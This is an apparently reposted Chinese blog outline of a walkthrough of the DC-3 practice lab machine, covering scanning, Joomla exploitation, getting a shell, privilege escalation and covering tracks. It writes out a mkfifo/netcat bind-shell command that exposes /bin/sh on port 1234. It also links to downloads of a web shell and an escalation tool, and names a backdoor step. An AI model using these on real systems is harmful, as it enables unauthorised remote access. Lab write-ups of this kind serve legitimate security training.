靶机记录(十一):DC-3
作者:互联网
目录
主机发现
端口扫描
Web渗透
可能有用的页面
漏洞挖掘
CMS利用
用 joomscan 获取 CMS 具体版本
GetShell
法1
mkfifo /tmp/t
cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t
法2
法3:大马
链接:https://pan.baidu.com/s/1hV7YYlsn1YO9nDqoSNBH5A
提取码:lish
提权
法1(失败了)
法2
可能下不下来
链接:https://pan.baidu.com/s/1CfR0EjF4t0vQXm7zrpO0mg
提取码:lish
清痕迹,留后门
标签:tmp,十一,GetShell,Web,端口扫描,DC,提权,靶机,CMS 来源: https://blog.csdn.net/weixin_47306547/article/details/121040534